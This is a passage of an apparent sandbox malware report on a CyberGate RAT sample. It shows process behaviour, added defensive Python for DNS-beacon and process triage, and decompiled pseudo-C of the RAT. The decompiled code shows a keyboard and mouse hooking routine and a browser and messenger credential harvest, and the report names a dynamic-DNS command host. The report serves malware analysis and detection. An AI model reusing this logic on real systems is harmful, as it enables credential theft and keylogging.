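        tag = "DDNS " if f["ddns"] else ""
        print(f"{tag}beacon: {f['src']} -> {f['name']} every ~{f['mean_interval_s']}s "
              f"({f['queries']} queries, cv={f['jitter_cv']}), resolves to {f['answers']}")
```

                                  On the constructed records the only hit is eduzao.ddns.net with a mean gap of about 7.5 s and a jitter coefficient near 0.06; the benign lookup is dropped by the minimum-count threshold. In production the same logic runs over passive DNS or resolver logs, and the dynamic-DNS flag is what lifts a low-volume periodic lookup from "curious" to "investigate the client".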

                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Memory Usage

                                  High Level Behavior Distribution

                                  Behavior

                                  System Behavior

                                  General

                                  Start time:23:54:05
                                  Start date:15/04/2021
                                  Path:C:\Users\user\Desktop\dqH3t8JU1x.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\dqH3t8JU1x.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Start time:23:54:08
                                  Start date:15/04/2021
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:
                                  Imagebase:0x7ff6f22f0000
                                  File size:3933184 bytes
                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:23:54:18
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Antivirus matches:
                                  • Detection: 100%, Avira
                                  • Detection: 100%, Joe Sandbox ML
                                  • Detection: 100%, ReversingLabs
                                  Reputation:low

                                  General

                                  Start time:23:54:27
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Start time:23:54:35
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Start time:23:55:11
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Start time:23:55:17
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000002.629304269.00000000240DB000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Start time:23:55:28
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.629145832.000000002406B000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, Author: Florian Roth
                                  Reputation:high

                                  General

                                  Start time:23:55:30
                                  Start date:15/04/2021
                                  Path:C:\Windows\install\TEXTURAFIVEM.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
                                  Imagebase:0x400000
                                  File size:282624 bytes
                                  MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT, Source: 00000019.00000002.587702834.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Start time:23:55:33
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:23:55:38
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:explorer.exe
                                  Imagebase:0xec0000
                                  File size:3611360 bytes
                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:Borland Delphi
                                  Yara matches:
                                  • Rule: Malware_QA_update, Description: VT Research QA uploaded malware - file update.exe, Source: 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp, Author: Florian Roth
                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.630397058.000000002406B000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:high

                                  General

                                  Start time:23:55:38
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 1104
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:23:55:44
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 1104
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:23:55:49
                                  Start date:15/04/2021
                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1112
                                  Imagebase:0xcd0000
                                  File size:434592 bytes
                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
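                                  Read together, the process blocks above tell the infection story: the submitted sample copies itself to C:\Windows\install\TEXTURAFIVEM.exe (same MD5) and relaunches from there, a 32-bit explorer.exe is started from SysWOW64 and then carries keylogger Yara hits in its memory, and WerFault.exe is spawned for several crashing PIDs. The script below is an added example, not Joe Sandbox code, that parses these "Key:value" blocks and applies a handful of triage rules. The records are a constructed subset copied from the list above, and the rules and the list of expected system directories are this example's assumptions.

```python
"""Triage the per-process 'General' blocks of a sandbox report.

Added example (not Joe Sandbox code). The block format is the report's own
"Key:value" lines; the records below are a constructed subset copied from the
process list above, and the rules are this example's assumptions.
"""
from __future__ import annotations

import re

SAMPLE_MD5 = "06E21AF52A3E3E5173A6A53725B1C217"
SAMPLE_PATH = r"C:\Users\user\Desktop\dqH3t8JU1x.exe"

# Directories under C:\Windows where executables are expected to live (assumption).
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\winsxs")

SAMPLE_REPORT = r"""
General

Start time:23:54:05
Path:C:\Users\user\Desktop\dqH3t8JU1x.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\dqH3t8JU1x.exe'
MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
Reputation:low
Yara matches:
• Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT

General

Start time:23:54:18
Path:C:\Windows\install\TEXTURAFIVEM.exe
Wow64 process (32bit):true
Commandline:'C:\Windows\install\TEXTURAFIVEM.exe'
MD5 hash:06E21AF52A3E3E5173A6A53725B1C217
Reputation:low
Yara matches:
• Rule: JoeSecurity_CyberGate, Description: Yara detected CyberGate RAT

General

Start time:23:54:08
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Reputation:high

General

Start time:23:55:11
Path:C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):true
Commandline:explorer.exe
MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
Reputation:high
Yara matches:
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic

General

Start time:23:55:33
Path:C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620
MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
Reputation:high
"""


def parse_process_blocks(text: str) -> list[dict]:
    """Split the report into one dict per 'General' block.

    A 'Key:' with an empty value opens a list (Yara matches, Antivirus matches)
    that the following bullet lines fill.
    """
    procs: list[dict] = []
    cur: dict | None = None
    list_key: str | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "General":
            cur, list_key = {}, None
            procs.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("•"):
            if list_key:
                cur[list_key].append(line.lstrip("• ").strip())
        elif ":" in line:
            key, value = (part.strip() for part in line.split(":", 1))
            if value:
                cur[key] = value
            else:
                cur[key] = []      # "Yara matches:" or an empty "Commandline:"
                list_key = key
    return procs


def triage(procs: list[dict], sample_md5: str, sample_path: str) -> list[tuple[str, str]]:
    """Apply a few behavioural rules and return (path, finding) pairs."""
    findings = []
    for p in procs:
        path = p.get("Path", "")
        low = path.lower()
        directory = low.rsplit("\\", 1)[0]
        cmd = p.get("Commandline") or ""          # an empty field parsed as []
        yara = p.get("Yara matches") or []

        # Same hash as the submitted sample but running from somewhere else:
        # the dropper copied itself (here into C:\Windows\install) and relaunched.
        if p.get("MD5 hash", "").upper() == sample_md5.upper() and low != sample_path.lower():
            findings.append((path, "copy of the submitted sample re-executed from a new location"))

        # Executables belong in System32/SysWOW64/WinSxS or C:\Windows itself;
        # a custom subdirectory is a persistence location, not a Windows component.
        if directory.startswith("c:\\windows\\") and not directory.startswith(SYSTEM_DIRS):
            findings.append((path, "executable running from a non-standard directory under C:\\Windows"))

        # A 32-bit explorer.exe spawned from SysWOW64 on a 64-bit host is not the
        # user's shell; it is a freshly started host process for injected code.
        if low.endswith("\\syswow64\\explorer.exe"):
            findings.append((path, "32-bit explorer.exe started from SysWOW64: injection/hollowing target"))

        # Memory Yara hits inside a trusted binary mean foreign code was written into it.
        if p.get("Reputation") == "high" and yara:
            findings.append((path, f"Yara hits in a high-reputation process: {', '.join(yara)}"))

        # WerFault is spawned for a crashing process; -p carries the crashed PID.
        m = re.search(r"WerFault\.exe .*-p (\d+)", cmd)
        if m:
            findings.append((path, f"Windows Error Reporting for crashed PID {m.group(1)}"))
    return findings


if __name__ == "__main__":
    for path, finding in triage(parse_process_blocks(SAMPLE_REPORT), SAMPLE_MD5, SAMPLE_PATH):
        print(f"{path}\n    {finding}")
```

                                  The directory rule deliberately compares the parent directory rather than the full path, so the 64-bit C:\Windows\explorer.exe that lives in the Windows root is not flagged while C:\Windows\install\TEXTURAFIVEM.exe is. Note that writing into C:\Windows\install at all requires administrative rights, which the report confirms every process in this run had.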

                                  Disassembly

                                  Code Analysis

                                    Executed Functions

                                    C-Code - Quality: 84%
                                    			E0040BBF4(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				void* _t49;
                                    				void* _t52;
                                    				long _t53;
                                    				void* _t55;
                                    				intOrPtr* _t65;
                                    				void* _t68;
                                    				long _t69;
                                    				char* _t80;
                                    				intOrPtr* _t93;
                                    				long _t97;
                                    				intOrPtr* _t100;
                                    				long _t104;
                                    				intOrPtr* _t107;
                                    				long _t111;
                                    				struct HINSTANCE__* _t114;
                                    				struct HINSTANCE__* _t117;
                                    				void* _t120;
                                    				void* _t209;
                                    				void* _t210;
                                    				void* _t211;
                                    				void* _t212;
                                    				void* _t213;
                                    				void* _t216;
                                    				void* _t217;
                                    				void* _t218;
                                    				void* _t219;
                                    				void* _t220;
                                    				void* _t221;
                                    				void* _t222;
                                    				intOrPtr _t229;
                                    				void* _t254;
                                    				void* _t255;
                                    				intOrPtr _t257;
                                    				intOrPtr _t258;
                                    				void* _t270;
                                    
                                    				_t255 = __esi;
                                    				_t254 = __edi;
                                    				_t257 = _t258;
                                    				_t213 = 0xb;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t213 = _t213 - 1;
                                    				} while (_t213 != 0);
                                    				E00403418(0x40bb04);
                                    				_push(_t257);
                                    				_push(0x40c0c4);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t258;
                                    				_t49 = E00403568(0, 0, "_x_X_UPDATE_X_x_"); // executed -- E00403568 creates a named kernel object (CreateMutexA-style wrapper, inferred from the 0xb7 test below)
                                    				_t209 = _t49;
                                    				if(GetLastError() != 0xb7) { // 0xb7 == ERROR_ALREADY_EXISTS: the name was already held by another instance
                                    					CloseHandle(_t209); // executed
                                    				} else {
                                    					CloseHandle(_t209);
                                    					Sleep(0x2ee0); // 12000 ms pause when _x_X_UPDATE_X_x_ already existed
                                    				}
                                    				_t52 = E00403568(0, 0, "_x_X_PASSWORDLIST_X_x_"); // executed
                                    				_t210 = _t52;
                                    				_t53 = GetLastError();
                                    				_t261 = _t53 - 0xb7;
                                    				if(_t53 != 0xb7) {
                                    					CloseHandle(_t210);
                                    					_t55 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_"); // executed
                                    					_t211 = _t55;
                                    					__eflags = GetLastError() - 0xb7;
                                    					if(__eflags != 0) {
                                    						CloseHandle(_t211);
                                    						L26:
                                    						E004013A4(1,  &_v80);
                                    						_t225 = "Restart";
                                    						E00401E94(_v80, "Restart");
                                    						if(__eflags != 0) {
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E00404604(_t213, __eflags);
                                    						E0040491C();
                                    						E0040B118(_t225, _t254, _t255);
                                    						_t65 =  *0x40d204; // 0x40e8f8
                                    						_t68 = E00403568(0, 0, E00401F48( *_t65)); // executed -- main instance object; its name comes from the configuration pointer at 0x40d204 and is retried three times below before ExitProcess
                                    						_t212 = _t68;
                                    						_t69 = GetLastError();
                                    						__eflags = _t69 - 0xb7;
                                    						if(_t69 != 0xb7) {
                                    							CloseHandle(_t212); // executed
                                    						} else {
                                    							CloseHandle(_t212);
                                    							Sleep(0x3e8);
                                    							_t93 =  *0x40d204; // 0x40e8f8
                                    							_t212 = E00403568(0, 0, E00401F48( *_t93));
                                    							_t97 = GetLastError();
                                    							__eflags = _t97 - 0xb7;
                                    							if(_t97 != 0xb7) {
                                    								CloseHandle(_t212);
                                    							} else {
                                    								CloseHandle(_t212);
                                    								Sleep(0x3e8);
                                    								_t100 =  *0x40d204; // 0x40e8f8
                                    								_t212 = E00403568(0, 0, E00401F48( *_t100));
                                    								_t104 = GetLastError();
                                    								__eflags = _t104 - 0xb7;
                                    								if(_t104 != 0xb7) {
                                    									CloseHandle(_t212);
                                    								} else {
                                    									CloseHandle(_t212);
                                    									Sleep(0x3e8);
                                    									_t107 =  *0x40d204; // 0x40e8f8
                                    									_t212 = E00403568(0, 0, E00401F48( *_t107));
                                    									_t111 = GetLastError();
                                    									__eflags = _t111 - 0xb7;
                                    									if(_t111 != 0xb7) {
                                    										CloseHandle(_t212);
                                    									} else {
                                    										ExitProcess(0);
                                    									}
                                    								}
                                    							}
                                    						}
                                    						__eflags =  *((char*)( *0x40d1dc)) - 1;
                                    						if( *((char*)( *0x40d1dc)) != 1) {
                                    							__eflags = 0;
                                    							E004013A4(0, 0x40f1e8);
                                    						} else {
                                    							E004013A4(0,  &_v88);
                                    							E00406B54(_v88, _t212,  &_v84, _t254, _t255); // executed
                                    							E00401B14(0x40f1e8, _v84);
                                    						}
                                    						E00406008( &_v92);
                                    						E00401D58( &_v92, "XX--XX--XX.txt");
                                    						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
                                    						_t80 =  *0x40d214; // 0x40e8f4
                                    						__eflags =  *_t80 - 1;
                                    						if(__eflags == 0) {
                                    							E0040B7FC(_t212, _t254, _t255, __eflags);
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E0040B3C0(_t212, _t213, _t254, _t255); // executed
                                    						L43:
                                    						_pop(_t229);
                                    						 *[fs:eax] = _t229;
                                    						_push(0x40c0cb);
                                    						return E00401AE4( &_v92, 0x12);
                                    					}
                                    					CloseHandle(_t211); // _x_X_BLOCKMOUSE_X_x_ already existed: install low-level input hooks and spin until E0040BA84 returns non-zero
                                    					_t114 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0); // 0xd == WH_KEYBOARD_LL
                                    					_t117 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xe, E0040B108, _t117, 0); // 0xe == WH_MOUSE_LL
                                    					while(1) {
                                    						_t120 = E0040BA84(__eflags);
                                    						__eflags = _t120;
                                    						if(_t120 != 0) {
                                    							break;
                                    						}
                                    						E00405918();
                                    					}
                                    					ExitProcess(0);
                                    					goto L26;
                                    				}
                                    				CloseHandle(_t210); // _x_X_PASSWORDLIST_X_x_ already existed: harvest stored credentials and write each set to a *.abc file
                                    				E00409AD4( &_v24, _t210, _t255, _t261);
                                    				E00401B14(0x40f1ec, _v24);
                                    				_t262 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v28);
                                    					E00401D58( &_v28, "NOIP.abc");
                                    					_pop(_t222);
                                    					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
                                    				}
                                    				E00409D28( &_v32, _t210, _t254, _t255);
                                    				_t235 = _v32;
                                    				E00401B14(0x40f1ec, _v32);
                                    				_t263 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "MSN.abc");
                                    					_t235 =  *0x40f1ec;
                                    					_pop(_t221);
                                    					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
                                    				}
                                    				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
                                    				E00401B14(0x40f1ec, _v40);
                                    				_t264 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v44);
                                    					E00401D58( &_v44, "FIREFOX.abc");
                                    					_pop(_t220);
                                    					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
                                    				}
                                    				E00409A84( &_v48);
                                    				E00401B14(0x40f1ec, _v48);
                                    				_t265 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v52);
                                    					E00401D58( &_v52, "IELOGIN.abc");
                                    					_pop(_t219);
                                    					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
                                    				}
                                    				E00409A90( &_v56);
                                    				E00401B14(0x40f1ec, _v56);
                                    				_t266 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v60);
                                    					E00401D58( &_v60, "IEPASS.abc");
                                    					_pop(_t218);
                                    					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
                                    				}
                                    				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
                                    				E00401B14(0x40f1ec, _v64);
                                    				_t267 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v68);
                                    					E00401D58( &_v68, "IEAUTO.abc");
                                    					_pop(_t217);
                                    					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
                                    				}
                                    				E00409AB8( &_v72, _t254, _t255, _t267);
                                    				E00401B14(0x40f1ec, _v72);
                                    				_t268 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v76);
                                    					E00401D58( &_v76, "IEWEB.abc");
                                    					_pop(_t216);
                                    					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
                                    				}
                                    				goto L43;
}

Instruction address column (0x0040bbf4 through 0x0040c0c3) for the decompiled lines above: extracted as a separate column with no alignment to the code lines, not reproduced here.

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp
• Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp
• Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
